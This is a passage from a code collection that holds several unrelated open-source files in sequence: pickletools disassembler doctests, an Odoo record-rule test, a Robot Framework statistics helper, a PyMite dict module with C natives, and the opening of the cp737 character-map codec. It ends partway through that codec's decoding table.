0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: c GLOBAL 'copy_reg _reconstructor'
30: p PUT 1
33: ( MARK
34: c GLOBAL 'pickletools _Example'
56: p PUT 2
59: c GLOBAL '__builtin__ object'
79: p PUT 3
82: N NONE
83: t TUPLE (MARK at 33)
84: p PUT 4
87: R REDUCE
88: p PUT 5
91: ( MARK
92: d DICT (MARK at 91)
93: p PUT 6
96: V UNICODE 'value'
103: p PUT 7
106: L LONG 42
111: s SETITEM
112: b BUILD
113: a APPEND
114: g GET 5
117: a APPEND
118: . STOP
highest protocol among opcodes = 0
>>> dis(pickle.dumps(x, 1))
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: c GLOBAL 'copy_reg _reconstructor'
29: q BINPUT 1
31: ( MARK
32: c GLOBAL 'pickletools _Example'
54: q BINPUT 2
56: c GLOBAL '__builtin__ object'
76: q BINPUT 3
78: N NONE
79: t TUPLE (MARK at 31)
80: q BINPUT 4
82: R REDUCE
83: q BINPUT 5
85: } EMPTY_DICT
86: q BINPUT 6
88: X BINUNICODE 'value'
98: q BINPUT 7
100: K BININT1 42
102: s SETITEM
103: b BUILD
104: h BINGET 5
106: e APPENDS (MARK at 3)
107: . STOP
highest protocol among opcodes = 1
Try "the canonical" recursive-object test.
>>> L = []
>>> T = L,
>>> L.append(T)
>>> L[0] is T
True
>>> T[0] is L
True
>>> L[0][0] is L
True
>>> T[0][0] is T
True
>>> dis(pickle.dumps(L, 0))
0: ( MARK
1: l LIST (MARK at 0)
2: p PUT 0
5: ( MARK
6: g GET 0
9: t TUPLE (MARK at 5)
10: p PUT 1
13: a APPEND
14: . STOP
highest protocol among opcodes = 0
>>> dis(pickle.dumps(L, 1))
0: ] EMPTY_LIST
1: q BINPUT 0
3: ( MARK
4: h BINGET 0
6: t TUPLE (MARK at 3)
7: q BINPUT 1
9: a APPEND
10: . STOP
highest protocol among opcodes = 1
Note that, in the protocol 0 pickle of the recursive tuple, the disassembler
has to emulate the stack in order to realize that the POP opcode at 16 gets
rid of the MARK at 0.
>>> dis(pickle.dumps(T, 0))
0: ( MARK
1: ( MARK
2: l LIST (MARK at 1)
3: p PUT 0
6: ( MARK
7: g GET 0
10: t TUPLE (MARK at 6)
11: p PUT 1
14: a APPEND
15: 0 POP
16: 0 POP (MARK at 0)
17: g GET 1
20: . STOP
highest protocol among opcodes = 0
>>> dis(pickle.dumps(T, 1))
0: ( MARK
1: ] EMPTY_LIST
2: q BINPUT 0
4: ( MARK
5: h BINGET 0
7: t TUPLE (MARK at 4)
8: q BINPUT 1
10: a APPEND
11: 1 POP_MARK (MARK at 0)
12: h BINGET 1
14: . STOP
highest protocol among opcodes = 1
Try protocol 2.
>>> dis(pickle.dumps(L, 2))
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: h BINGET 0
7: \x85 TUPLE1
8: q BINPUT 1
10: a APPEND
11: . STOP
highest protocol among opcodes = 2
>>> dis(pickle.dumps(T, 2))
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: h BINGET 0
7: \x85 TUPLE1
8: q BINPUT 1
10: a APPEND
11: 0 POP
12: h BINGET 1
14: . STOP
highest protocol among opcodes = 2
Try protocol 3 with annotations:
>>> dis(pickle.dumps(T, 3), annotate=1)
0: \x80 PROTO 3 Protocol version indicator.
2: ] EMPTY_LIST Push an empty list.
3: q BINPUT 0 Store the stack top into the memo. The stack is not popped.
5: h BINGET 0 Read an object from the memo and push it on the stack.
7: \x85 TUPLE1 Build a one-tuple out of the topmost item on the stack.
8: q BINPUT 1 Store the stack top into the memo. The stack is not popped.
10: a APPEND Append an object to a list.
11: 0 POP Discard the top stack item, shrinking the stack by one item.
12: h BINGET 1 Read an object from the memo and push it on the stack.
14: . STOP Stop the unpickling machine.
highest protocol among opcodes = 2
"""
_memo_test = r"""
>>> import pickle
>>> import io
>>> f = io.BytesIO()
>>> p = pickle.Pickler(f, 2)
>>> x = [1, 2, 3]
>>> p.dump(x)
>>> p.dump(x)
>>> f.seek(0)
0
>>> memo = {}
>>> dis(f, memo=memo)
0: \x80 PROTO 2
2: ] EMPTY_LIST
3: q BINPUT 0
5: ( MARK
6: K BININT1 1
8: K BININT1 2
10: K BININT1 3
12: e APPENDS (MARK at 5)
13: . STOP
highest protocol among opcodes = 2
>>> dis(f, memo=memo)
14: \x80 PROTO 2
16: h BINGET 0
18: . STOP
highest protocol among opcodes = 2
"""
__test__ = {'disassembler_test': _dis_test,
'disassembler_memo_test': _memo_test,
}
def _test():
import doctest
return doctest.testmod()
if __name__ == "__main__":
import sys, argparse
parser = argparse.ArgumentParser(
description='disassemble one or more pickle files')
parser.add_argument(
'pickle_file', type=argparse.FileType('br'),
nargs='*', help='the pickle file')
parser.add_argument(
'-o', '--output', default=sys.stdout, type=argparse.FileType('w'),
help='the file where the output should be written')
parser.add_argument(
'-m', '--memo', action='store_true',
help='preserve memo between disassemblies')
parser.add_argument(
'-l', '--indentlevel', default=4, type=int,
help='the number of blanks by which to indent a new MARK level')
parser.add_argument(
'-a', '--annotate', action='store_true',
help='annotate each line with a short opcode description')
parser.add_argument(
'-p', '--preamble', default="==> {name} <==",
help='if more than one pickle file is specified, print this before'
' each disassembly')
parser.add_argument(
'-t', '--test', action='store_true',
help='run self-test suite')
parser.add_argument(
'-v', action='store_true',
help='run verbosely; only affects self-test run')
args = parser.parse_args()
if args.test:
_test()
else:
annotate = 30 if args.annotate else 0
if not args.pickle_file:
parser.print_help()
elif len(args.pickle_file) == 1:
dis(args.pickle_file[0], args.output, None,
args.indentlevel, annotate)
else:
memo = {} if args.memo else None
for f in args.pickle_file:
preamble = args.preamble.format(name=f.name)
args.output.write(preamble + '\n')
dis(f, args.output, memo, args.indentlevel, annotate)
| lgpl-3.0 |
patmcb/odoo | openerp/addons/test_access_rights/tests/test_ir_rules.py | 299 | 1220 | import openerp.exceptions
from openerp.tests.common import TransactionCase
class TestRules(TransactionCase):
def setUp(self):
super(TestRules, self).setUp()
self.id1 = self.env['test_access_right.some_obj']\
.create({'val': 1}).id
self.id2 = self.env['test_access_right.some_obj']\
.create({'val': -1}).id
# create a global rule forbidding access to records with a negative
# (or zero) val
self.env['ir.rule'].create({
'name': 'Forbid negatives',
'model_id': self.browse_ref('test_access_rights.model_test_access_right_some_obj').id,
'domain_force': "[('val', '>', 0)]"
})
def test_basic_access(self):
env = self.env(user=self.browse_ref('base.public_user'))
# put forbidden record in cache
browse2 = env['test_access_right.some_obj'].browse(self.id2)
# this is the one we want
browse1 = env['test_access_right.some_obj'].browse(self.id1)
# this should not blow up
self.assertEqual(browse1.val, 1)
# but this should
with self.assertRaises(openerp.exceptions.AccessError):
self.assertEqual(browse2.val, -1)
| agpl-3.0 |
kurtdawg24/robotframework | atest/robot/output/html_output_stats.py | 30 | 1180 | from robot.api import logger
class WrongStat(AssertionError):
ROBOT_CONTINUE_ON_FAILURE = True
def get_total_stats(path):
return get_all_stats(path)[0]
def get_tag_stats(path):
return get_all_stats(path)[1]
def get_suite_stats(path):
return get_all_stats(path)[2]
def get_all_stats(path):
logger.info('Getting stats from <a href="file://%s">%s</a>' % (path, path),
html=True)
stats_line = _get_stats_line(path)
logger.debug('Stats line: %s' % stats_line)
total, tags, suite = eval(stats_line)
return total, tags, suite
def _get_stats_line(path):
prefix = 'window.output["stats"] = '
with open(path) as file:
for line in file:
if line.startswith(prefix):
return line[len(prefix):-2]
def verify_stat(stat, *attrs):
stat.pop('elapsed')
expected = dict(_get_expected_stat(attrs))
if stat != expected:
raise WrongStat('\n%-9s: %s\n%-9s: %s' % ('Got', stat, 'Expected', expected))
def _get_expected_stat(attrs):
for key, value in (a.split(':', 1) for a in attrs):
value = int(value) if value.isdigit() else str(value)
yield str(key), value
| apache-2.0 |
etaos/etaos | kernel/python/lib/dict.py | 1 | 4692 | #
# ETA/OS - CPU class
# Copyright (C) 2017 Dean Hall
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
## @addtogroup python-dict
# @{
## @package dict
# @brief Provides PyMite's dict module.
__name__ = "dict"
class _Autobox:
def clear(self):
return clear(self.obj)
def keys(self):
return keys(self.obj)
def has_key(self, k):
return has_key(self.obj, k)
def values(self):
return values(self.obj)
## Clear a dictionary.
# @param d Dictionary to clear.
# @return None.
def clear(d):
"""__NATIVE__
pPmObj_t pd;
PmReturn_t retval = PM_RET_OK;
/* Raise TypeError if it's not a dict or wrong number of args, */
pd = NATIVE_GET_LOCAL(0);
if ((OBJ_GET_TYPE(pd) != OBJ_TYPE_DIC) || (NATIVE_GET_NUM_ARGS() != 1))
{
PM_RAISE(retval, PM_RET_EX_TYPE);
return retval;
}
/* Clear the contents of the dict */
retval = dict_clear(pd);
PM_RETURN_IF_ERROR(retval);
NATIVE_SET_TOS(PM_NONE);
return retval;
"""
pass
## Return a list of keys in \p d.
# @param d Dictionary
# @return Keys of \p d.
def keys(d):
"""__NATIVE__
pPmObj_t pd;
pPmObj_t pl;
pPmObj_t pk;
pSeglist_t psl;
uint16_t i;
PmReturn_t retval = PM_RET_OK;
uint8_t objid;
/* Raise TypeError if it's not a dict or wrong number of args, */
pd = NATIVE_GET_LOCAL(0);
if ((OBJ_GET_TYPE(pd) != OBJ_TYPE_DIC) || (NATIVE_GET_NUM_ARGS() != 1))
{
PM_RAISE(retval, PM_RET_EX_TYPE);
return retval;
}
/* Create empty list */
retval = list_new(&pl);
PM_RETURN_IF_ERROR(retval);
/* Iterate through the keys seglist */
psl = ((pPmDict_t)pd)->d_keys;
for (i = 0; i < ((pPmDict_t)pd)->length; i++)
{
/* Get the key and append it to the list */
retval = seglist_getItem(psl, i, &pk);
PM_RETURN_IF_ERROR(retval);
heap_gcPushTempRoot(pl, &objid);
retval = list_append(pl, pk);
heap_gcPopTempRoot(objid);
PM_RETURN_IF_ERROR(retval);
}
/* Return the list of keys to the caller */
NATIVE_SET_TOS(pl);
return retval;
"""
pass
## Check if \p k is in \p d.
# @param d Dictionary to check.
# @param k Key to check for.
# @return Boolean value.
def has_key(d, k):
return k in d
## Return the value list of \p d.
# @param d Dictionary to get the values for.
# @return The values found in \p d.
def values(d):
"""__NATIVE__
pPmObj_t pd;
pPmObj_t pl;
pPmObj_t pv;
pSeglist_t psl;
uint16_t i;
PmReturn_t retval = PM_RET_OK;
uint8_t objid;
/* Raise TypeError if it's not a dict or wrong number of args, */
pd = NATIVE_GET_LOCAL(0);
if ((OBJ_GET_TYPE(pd) != OBJ_TYPE_DIC) || (NATIVE_GET_NUM_ARGS() != 1))
{
PM_RAISE(retval, PM_RET_EX_TYPE);
return retval;
}
/* Create empty list */
retval = list_new(&pl);
PM_RETURN_IF_ERROR(retval);
/* Iterate through the values seglist */
psl = ((pPmDict_t)pd)->d_vals;
for (i = 0; i < ((pPmDict_t)pd)->length; i++)
{
/* Get the value and append it to the list */
retval = seglist_getItem(psl, i, &pv);
PM_RETURN_IF_ERROR(retval);
heap_gcPushTempRoot(pl, &objid);
retval = list_append(pl, pv);
heap_gcPopTempRoot(objid);
PM_RETURN_IF_ERROR(retval);
}
/* Return the list of values to the caller */
NATIVE_SET_TOS(pl);
return retval;
"""
pass
## Update \p d1 with the contents of \p d2.
# @param d1 Dictionary
# @param d2 Dictionary
# @return None
def update(d1, d2):
"""__NATIVE__
pPmObj_t pd1;
pPmObj_t pd2;
PmReturn_t retval;
/* Raise TypeError if wrong number of args, */
if (NATIVE_GET_NUM_ARGS() != 2)
{
PM_RAISE(retval, PM_RET_EX_TYPE);
return retval;
}
pd1 = NATIVE_GET_LOCAL(0);
pd2 = NATIVE_GET_LOCAL(1);
retval = dict_update(pd1, pd2, C_FALSE);
NATIVE_SET_TOS(PM_NONE);
return retval;
"""
pass
## @}
# :mode=c:
| lgpl-3.0 |
171121130/SWI | venv/Lib/encodings/cp737.py | 272 | 34681 | """ Python Character Mapping Codec cp737 generated from 'VENDORS/MICSFT/PC/CP737.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_map)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='cp737',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x0391, # GREEK CAPITAL LETTER ALPHA
0x0081: 0x0392, # GREEK CAPITAL LETTER BETA
0x0082: 0x0393, # GREEK CAPITAL LETTER GAMMA
0x0083: 0x0394, # GREEK CAPITAL LETTER DELTA
0x0084: 0x0395, # GREEK CAPITAL LETTER EPSILON
0x0085: 0x0396, # GREEK CAPITAL LETTER ZETA
0x0086: 0x0397, # GREEK CAPITAL LETTER ETA
0x0087: 0x0398, # GREEK CAPITAL LETTER THETA
0x0088: 0x0399, # GREEK CAPITAL LETTER IOTA
0x0089: 0x039a, # GREEK CAPITAL LETTER KAPPA
0x008a: 0x039b, # GREEK CAPITAL LETTER LAMDA
0x008b: 0x039c, # GREEK CAPITAL LETTER MU
0x008c: 0x039d, # GREEK CAPITAL LETTER NU
0x008d: 0x039e, # GREEK CAPITAL LETTER XI
0x008e: 0x039f, # GREEK CAPITAL LETTER OMICRON
0x008f: 0x03a0, # GREEK CAPITAL LETTER PI
0x0090: 0x03a1, # GREEK CAPITAL LETTER RHO
0x0091: 0x03a3, # GREEK CAPITAL LETTER SIGMA
0x0092: 0x03a4, # GREEK CAPITAL LETTER TAU
0x0093: 0x03a5, # GREEK CAPITAL LETTER UPSILON
0x0094: 0x03a6, # GREEK CAPITAL LETTER PHI
0x0095: 0x03a7, # GREEK CAPITAL LETTER CHI
0x0096: 0x03a8, # GREEK CAPITAL LETTER PSI
0x0097: 0x03a9, # GREEK CAPITAL LETTER OMEGA
0x0098: 0x03b1, # GREEK SMALL LETTER ALPHA
0x0099: 0x03b2, # GREEK SMALL LETTER BETA
0x009a: 0x03b3, # GREEK SMALL LETTER GAMMA
0x009b: 0x03b4, # GREEK SMALL LETTER DELTA
0x009c: 0x03b5, # GREEK SMALL LETTER EPSILON
0x009d: 0x03b6, # GREEK SMALL LETTER ZETA
0x009e: 0x03b7, # GREEK SMALL LETTER ETA
0x009f: 0x03b8, # GREEK SMALL LETTER THETA
0x00a0: 0x03b9, # GREEK SMALL LETTER IOTA
0x00a1: 0x03ba, # GREEK SMALL LETTER KAPPA
0x00a2: 0x03bb, # GREEK SMALL LETTER LAMDA
0x00a3: 0x03bc, # GREEK SMALL LETTER MU
0x00a4: 0x03bd, # GREEK SMALL LETTER NU
0x00a5: 0x03be, # GREEK SMALL LETTER XI
0x00a6: 0x03bf, # GREEK SMALL LETTER OMICRON
0x00a7: 0x03c0, # GREEK SMALL LETTER PI
0x00a8: 0x03c1, # GREEK SMALL LETTER RHO
0x00a9: 0x03c3, # GREEK SMALL LETTER SIGMA
0x00aa: 0x03c2, # GREEK SMALL LETTER FINAL SIGMA
0x00ab: 0x03c4, # GREEK SMALL LETTER TAU
0x00ac: 0x03c5, # GREEK SMALL LETTER UPSILON
0x00ad: 0x03c6, # GREEK SMALL LETTER PHI
0x00ae: 0x03c7, # GREEK SMALL LETTER CHI
0x00af: 0x03c8, # GREEK SMALL LETTER PSI
0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x2561, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x00b6: 0x2562, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x00b7: 0x2556, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x00b8: 0x2555, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x255c, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x00be: 0x255b, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x255e, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x00c7: 0x255f, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x2567, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x00d0: 0x2568, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x00d1: 0x2564, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x00d2: 0x2565, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
0x00d3: 0x2559, # BOX DRAWINGS UP DOUBLE AND RIGHT SINGLE
0x00d4: 0x2558, # BOX DRAWINGS UP SINGLE AND RIGHT DOUBLE
0x00d5: 0x2552, # BOX DRAWINGS DOWN SINGLE AND RIGHT DOUBLE
0x00d6: 0x2553, # BOX DRAWINGS DOWN DOUBLE AND RIGHT SINGLE
0x00d7: 0x256b, # BOX DRAWINGS VERTICAL DOUBLE AND HORIZONTAL SINGLE
0x00d8: 0x256a, # BOX DRAWINGS VERTICAL SINGLE AND HORIZONTAL DOUBLE
0x00d9: 0x2518, # BOX DRAWINGS LIGHT UP AND LEFT
0x00da: 0x250c, # BOX DRAWINGS LIGHT DOWN AND RIGHT
0x00db: 0x2588, # FULL BLOCK
0x00dc: 0x2584, # LOWER HALF BLOCK
0x00dd: 0x258c, # LEFT HALF BLOCK
0x00de: 0x2590, # RIGHT HALF BLOCK
0x00df: 0x2580, # UPPER HALF BLOCK
0x00e0: 0x03c9, # GREEK SMALL LETTER OMEGA
0x00e1: 0x03ac, # GREEK SMALL LETTER ALPHA WITH TONOS
0x00e2: 0x03ad, # GREEK SMALL LETTER EPSILON WITH TONOS
0x00e3: 0x03ae, # GREEK SMALL LETTER ETA WITH TONOS
0x00e4: 0x03ca, # GREEK SMALL LETTER IOTA WITH DIALYTIKA
0x00e5: 0x03af, # GREEK SMALL LETTER IOTA WITH TONOS
0x00e6: 0x03cc, # GREEK SMALL LETTER OMICRON WITH TONOS
0x00e7: 0x03cd, # GREEK SMALL LETTER UPSILON WITH TONOS
0x00e8: 0x03cb, # GREEK SMALL LETTER UPSILON WITH DIALYTIKA
0x00e9: 0x03ce, # GREEK SMALL LETTER OMEGA WITH TONOS
0x00ea: 0x0386, # GREEK CAPITAL LETTER ALPHA WITH TONOS
0x00eb: 0x0388, # GREEK CAPITAL LETTER EPSILON WITH TONOS
0x00ec: 0x0389, # GREEK CAPITAL LETTER ETA WITH TONOS
0x00ed: 0x038a, # GREEK CAPITAL LETTER IOTA WITH TONOS
0x00ee: 0x038c, # GREEK CAPITAL LETTER OMICRON WITH TONOS
0x00ef: 0x038e, # GREEK CAPITAL LETTER UPSILON WITH TONOS
0x00f0: 0x038f, # GREEK CAPITAL LETTER OMEGA WITH TONOS
0x00f1: 0x00b1, # PLUS-MINUS SIGN
0x00f2: 0x2265, # GREATER-THAN OR EQUAL TO
0x00f3: 0x2264, # LESS-THAN OR EQUAL TO
0x00f4: 0x03aa, # GREEK CAPITAL LETTER IOTA WITH DIALYTIKA
0x00f5: 0x03ab, # GREEK CAPITAL LETTER UPSILON WITH DIALYTIKA
0x00f6: 0x00f7, # DIVISION SIGN
0x00f7: 0x2248, # ALMOST EQUAL TO
0x00f8: 0x00b0, # DEGREE SIGN
0x00f9: 0x2219, # BULLET OPERATOR
0x00fa: 0x00b7, # MIDDLE DOT
0x00fb: 0x221a, # SQUARE ROOT
0x00fc: 0x207f, # SUPERSCRIPT LATIN SMALL LETTER N
0x00fd: 0x00b2, # SUPERSCRIPT TWO
0x00fe: 0x25a0, # BLACK SQUARE
0x00ff: 0x00a0, # NO-BREAK SPACE
})
### Decoding Table
decoding_table = (
'\x00' # 0x0000 -> NULL
'\x01' # 0x0001 -> START OF HEADING
'\x02' # 0x0002 -> START OF TEXT
'\x03' # 0x0003 -> END OF TEXT
'\x04' # 0x0004 -> END OF TRANSMISSION
'\x05' # 0x0005 -> ENQUIRY
'\x06' # 0x0006 -> ACKNOWLEDGE
'\x07' # 0x0007 -> BELL
'\x08' # 0x0008 -> BACKSPACE
'\t' # 0x0009 -> HORIZONTAL TABULATION
'\n' # 0x000a -> LINE FEED
'\x0b' # 0x000b -> VERTICAL TABULATION
'\x0c' # 0x000c -> FORM FEED
'\r' # 0x000d -> CARRIAGE RETURN
'\x0e' # 0x000e -> SHIFT OUT
'\x0f' # 0x000f -> SHIFT IN
'\x10' # 0x0010 -> DATA LINK ESCAPE
'\x11' # 0x0011 -> DEVICE CONTROL ONE
'\x12' # 0x0012 -> DEVICE CONTROL TWO
'\x13' # 0x0013 -> DEVICE CONTROL THREE
'\x14' # 0x0014 -> DEVICE CONTROL FOUR
'\x15' # 0x0015 -> NEGATIVE ACKNOWLEDGE
'\x16' # 0x0016 -> SYNCHRONOUS IDLE
'\x17' # 0x0017 -> END OF TRANSMISSION BLOCK
'\x18' # 0x0018 -> CANCEL
'\x19' # 0x0019 -> END OF MEDIUM
'\x1a' # 0x001a -> SUBSTITUTE
'\x1b' # 0x001b -> ESCAPE
'\x1c' # 0x001c -> FILE SEPARATOR
'\x1d' # 0x001d -> GROUP SEPARATOR
'\x1e' # 0x001e -> RECORD SEPARATOR
'\x1f' # 0x001f -> UNIT SEPARATOR
' ' # 0x0020 -> SPACE
'!' # 0x0021 -> EXCLAMATION MARK
'"' # 0x0022 -> QUOTATION MARK
'#' # 0x0023 -> NUMBER SIGN
'$' # 0x0024 -> DOLLAR SIGN
'%' # 0x0025 -> PERCENT SIGN
'&' # 0x0026 -> AMPERSAND
"'" # 0x0027 -> APOSTROPHE
'(' # 0x0028 -> LEFT PARENTHESIS
')' # 0x0029 -> RIGHT PARENTHESIS
'*' # 0x002a -> ASTERISK
'+' # 0x002b -> PLUS SIGN
',' # 0x002c -> COMMA
'-' # 0x002d -> HYPHEN-MINUS
'.' # 0x002e -> FULL STOP
'/' # 0x002f -> SOLIDUS
'0' # 0x0030 -> DIGIT ZERO
'1' # 0x0031 -> DIGIT ONE
'2' # 0x0032 -> DIGIT TWO
'3' # 0x0033 -> DIGIT THREE
'4' # 0x0034 -> DIGIT FOUR
'5' # 0x0035 -> DIGIT FIVE
'6' # 0x0036 -> DIGIT SIX
'7' # 0x0037 -> DIGIT SEVEN
'8' # 0x0038 -> DIGIT EIGHT
'9' # 0x0039 -> DIGIT NINE
':' # 0x003a -> COLON
';' # 0x003b -> SEMICOLON
'<' # 0x003c -> LESS-THAN SIGN
'=' # 0x003d -> EQUALS SIGN
'>' # 0x003e -> GREATER-THAN SIGN
'?' # 0x003f -> QUESTION MARK
'@' # 0x0040 -> COMMERCIAL AT
'A' # 0x0041 -> LATIN CAPITAL LETTER A
'B' # 0x0042 -> LATIN CAPITAL LETTER B
'C' # 0x0043 -> LATIN CAPITAL LETTER C
'D' # 0x0044 -> LATIN CAPITAL LETTER D
'E' # 0x0045 -> LATIN CAPITAL LETTER E
'F' # 0x0046 -> LATIN CAPITAL LETTER F
'G' # 0x0047 -> LATIN CAPITAL LETTER G
'H' # 0x0048 -> LATIN CAPITAL LETTER H
'I' # 0x0049 -> LATIN CAPITAL LETTER I
'J' # 0x004a -> LATIN CAPITAL LETTER J
'K' # 0x004b -> LATIN CAPITAL LETTER K
'L' # 0x004c -> LATIN CAPITAL LETTER L
'M' # 0x004d -> LATIN CAPITAL LETTER M
'N' # 0x004e -> LATIN CAPITAL LETTER N
'O' # 0x004f -> LATIN CAPITAL LETTER O
'P' # 0x0050 -> LATIN CAPITAL LETTER P
'Q' # 0x0051 -> LATIN CAPITAL LETTER Q
'R' # 0x0052 -> LATIN CAPITAL LETTER R
'S' # 0x0053 -> LATIN CAPITAL LETTER S
'T' # 0x0054 -> LATIN CAPITAL LETTER T
'U' # 0x0055 -> LATIN CAPITAL LETTER U
'V' # 0x0056 -> LATIN CAPITAL LETTER V
'W' # 0x0057 -> LATIN CAPITAL LETTER W
'X' # 0x0058 -> LATIN CAPITAL LETTER X
'Y' # 0x0059 -> LATIN CAPITAL LETTER Y
'Z' # 0x005a -> LATIN CAPITAL LETTER Z
'[' # 0x005b -> LEFT SQUARE BRACKET
'\\' # 0x005c -> REVERSE SOLIDUS
']' # 0x005d -> RIGHT SQUARE BRACKET
'^' # 0x005e -> CIRCUMFLEX ACCENT
'_' # 0x005f -> LOW LINE
'`' # 0x0060 -> GRAVE ACCENT
'a' # 0x0061 -> LATIN SMALL LETTER A
'b' # 0x0062 -> LATIN SMALL LETTER B
'c' # 0x0063 -> LATIN SMALL LETTER C
'd' # 0x0064 -> LATIN SMALL LETTER D
'e' # 0x0065 -> LATIN SMALL LETTER E
'f' # 0x0066 -> LATIN SMALL LETTER F
'g' # 0x0067 -> LATIN SMALL LETTER G
'h' # 0x0068 -> LATIN SMALL LETTER H
'i' # 0x0069 -> LATIN SMALL LETTER I
'j' # 0x006a -> LATIN SMALL LETTER J
'k' # 0x006b -> LATIN SMALL LETTER K
'l' # 0x006c -> LATIN SMALL LETTER L
'm' # 0x006d -> LATIN SMALL LETTER M
'n' # 0x006e -> LATIN SMALL LETTER N
'o' # 0x006f -> LATIN SMALL LETTER O
'p' # 0x0070 -> LATIN SMALL LETTER P
'q' # 0x0071 -> LATIN SMALL LETTER Q
'r' # 0x0072 -> LATIN SMALL LETTER R
's' # 0x0073 -> LATIN SMALL LETTER S
't' # 0x0074 -> LATIN SMALL LETTER T
'u' # 0x0075 -> LATIN SMALL LETTER U
'v' # 0x0076 -> LATIN SMALL LETTER V
'w' # 0x0077 -> LATIN SMALL LETTER W
'x' # 0x0078 -> LATIN SMALL LETTER X
'y' # 0x0079 -> LATIN SMALL LETTER Y
'z' # 0x007a -> LATIN SMALL LETTER Z
'{' # 0x007b -> LEFT CURLY BRACKET
'|' # 0x007c -> VERTICAL LINE
'}' # 0x007d -> RIGHT CURLY BRACKET
'~' # 0x007e -> TILDE
'\x7f' # 0x007f -> DELETE
'\u0391' # 0x0080 -> GREEK CAPITAL LETTER ALPHA
'\u0392' # 0x0081 -> GREEK CAPITAL LETTER BETA
'\u0393' # 0x0082 -> GREEK CAPITAL LETTER GAMMA
'\u0394' # 0x0083 -> GREEK CAPITAL LETTER DELTA
'\u0395' # 0x0084 -> GREEK CAPITAL LETTER EPSILON
'\u0396' # 0x0085 -> GREEK CAPITAL LETTER ZETA
'\u0397' # 0x0086 -> GREEK CAPITAL LETTER ETA
'\u0398' # 0x0087 -> GREEK CAPITAL LETTER THETA
'\u0399' # 0x0088 -> GREEK CAPITAL LETTER IOTA
'\u039a' # 0x0089 -> GREEK CAPITAL LETTER KAPPA
'\u039b' # 0x008a -> GREEK CAPITAL LETTER LAMDA
'\u039c' # 0x008b -> GREEK CAPITAL LETTER MU
'\u039d' # 0x008c -> GREEK CAPITAL LETTER NU
'\u039e' # 0x008d -> GREEK CAPITAL LETTER XI
'\u039f' # 0x008e -> GREEK CAPITAL LETTER OMICRON
'\u03a0' # 0x008f -> GREEK CAPITAL LETTER PI
'\u03a1' # 0x0090 -> GREEK CAPITAL LETTER RHO
'\u03a3' # 0x0091 -> GREEK CAPITAL LETTER SIGMA
'\u03a4' # 0x0092 -> GREEK CAPITAL LETTER TAU
